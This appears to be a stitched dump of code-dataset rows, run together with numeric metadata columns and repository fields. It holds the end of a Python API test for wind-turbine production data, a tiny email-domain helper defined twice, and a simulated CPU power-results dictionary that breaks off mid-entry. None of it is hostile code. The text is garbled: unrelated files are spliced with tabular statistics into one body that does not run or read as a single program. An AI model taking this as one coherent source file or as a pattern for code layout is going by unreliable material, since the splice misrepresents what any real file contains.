        timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
        aggregate = 'device'
        aggregate_level = 0
        category = APIHelper.json_deserialize('["stop"]')

        # Perform the API call through the SDK function
        result = self.controller.get_data_per_category(device_ids, data_signal_id, timestamp_start, timestamp_end, aggregate, aggregate_level, category)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 200)

        # Test headers
        expected_headers = {}
        expected_headers['content-type'] = 'application/json; charset=utf-8'
        self.assertTrue(TestHelper.match_headers(expected_headers, self.response_catcher.response.headers))

        # Test whether the captured response is as we expected
        self.assertIsNotNone(result)
        expected_body = APIHelper.json_deserialize(
            '{"dataSignal":{"dataSignalId":248,"title":"Lost Production (Contractual)",'
            '"unit":"kWh"},"calculation":"sum","data":[{"aggregateId":6,"aggregatePathNa'
            'mes":[],"deviceIds":[1,2,3],"contractTitle":"Vestas 1","categoryTitle":"Ici'
            'ng","categoryTime":"available","value":104.55,"duration":150},{"aggregateId'
            '":6,"aggregatePathNames":[],"deviceIds":[1,2,3],"contractTitle":"Vestas 1",'
            '"categoryTitle":"Utility","categoryTime":"excluded","value":73,"duration":5'
            '0.3}]}'
        )
        received_body = APIHelper.json_deserialize(self.response_catcher.response.raw_body)
        self.assertTrue(TestHelper.match_body(expected_body, received_body))

    # Gets signal data aggregated per availability contract category.
    #
    #_🔐 This endpoint requires the **Data** and **Statuses** endpoint permissions._
    #
    #_This request can also be made using the POST method,
    #with a request to `datapercategory.json` and
    #a JSON request body instead of query parameters._
    #
    def test_test_get_data_per_category_1(self):
        # Parameters for the API call
        device_ids = APIHelper.json_deserialize('[1,2,3]')
        data_signal_id = 248
        timestamp_start = APIHelper.RFC3339DateTime.from_value('2020-01-01T00:00:00Z').datetime
        timestamp_end = APIHelper.RFC3339DateTime.from_value('2020-01-08T00:00:00Z').datetime
        aggregate = 'device'
        aggregate_level = 0
        category = APIHelper.json_deserialize('["stop"]')

        # Perform the API call through the SDK function
        result = self.controller.get_data_per_category(device_ids, data_signal_id, timestamp_start, timestamp_end, aggregate, aggregate_level, category)

        # Test response code
        self.assertEquals(self.response_catcher.response.status_code, 204)
| 44.392491
| 164
| 0.677404
| 1,580
| 13,007
| 5.417722
| 0.141772
| 0.033411
| 0.061682
| 0.050467
| 0.904439
| 0.891355
| 0.880841
| 0.880841
| 0.851636
| 0.851636
| 0
| 0.037015
| 0.212808
| 13,007
| 292
| 165
| 44.544521
| 0.798222
| 0.287384
| 0
| 0.656716
| 1
| 0.044776
| 0.227213
| 0.164153
| 0
| 0
| 0
| 0
| 0.149254
| 1
| 0.067164
| false
| 0
| 0.037313
| 0
| 0.11194
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6e9f85035b6d740909725f57329e6ef52d71d304
| 252
|
py
|
Python
|
codesignal/string/findEmailDomain.py
|
peterlamar/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 140
|
2020-10-21T13:23:52.000Z
|
2022-03-31T15:09:45.000Z
|
codesignal/string/findEmailDomain.py
|
ajibolashodipo/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 1
|
2021-07-22T14:01:25.000Z
|
2021-07-22T14:01:25.000Z
|
codesignal/string/findEmailDomain.py
|
ajibolashodipo/python-cp-cheatsheet
|
f9f854064a3c657c04fab27d0a496401bfa97da1
|
[
"Apache-2.0"
] | 33
|
2020-10-21T14:17:02.000Z
|
2022-03-25T11:25:03.000Z
|
"""
For address = "prettyandsimple@example.com", the output should be
findEmailDomain(address) = "example.com";
"""
def findEmailDomain(address):
return address.split('@')[-1]
def findEmailDomain(address):
return address[address.rfind('@')+1:]
| 28
| 65
| 0.710317
| 28
| 252
| 6.392857
| 0.535714
| 0.368715
| 0.27933
| 0.346369
| 0.424581
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008969
| 0.115079
| 252
| 9
| 66
| 28
| 0.793722
| 0.424603
| 0
| 0.5
| 0
| 0
| 0.014493
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
6edff66812ee71ae6adde099ab3aab58d28ba6ce
| 68,626
|
py
|
Python
|
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
benchmarks/SimResults/micro_pinned_train_combos/cmpB_bwavesgcccactusADMgromacs/power.py
|
TugberkArkose/MLScheduler
|
e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061
|
[
"Unlicense"
] | null | null | null |
power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.302632,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.44039,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.74064,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.728653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.26176,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.723657,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 2.71407,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.453379,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 8.84284,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.328844,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0264143,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.299986,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.19535,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.62883,
'Execution Unit/Register Files/Runtime Dynamic': 0.221764,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.807798,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.80673,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 5.58833,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00113814,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00113814,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000994454,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000386686,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00280621,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00607694,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0108002,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.187795,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.387106,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.637835,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.22961,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0676826,
'L2/Runtime Dynamic': 0.0135037,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.47358,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.51904,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.169412,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.169412,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.27684,
'Load Store Unit/Runtime Dynamic': 3.52393,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.417741,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.835482,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.148258,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.149268,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.063478,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.814803,
'Memory Management Unit/Runtime Dynamic': 0.212746,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 30.5326,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.14726,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0510646,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.358373,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.5567,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 12.1248,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 2.83407e-06,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.202691,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01201e-05,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.154568,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.249312,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.125844,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.529725,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.176778,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.16878,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 1.91191e-06,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00648327,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0468833,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0479478,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0468852,
'Execution Unit/Register Files/Runtime Dynamic': 0.054431,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.0987706,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.253717,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.44594,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00222979,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00222979,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00200626,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000811718,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000688773,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00715461,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0190885,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
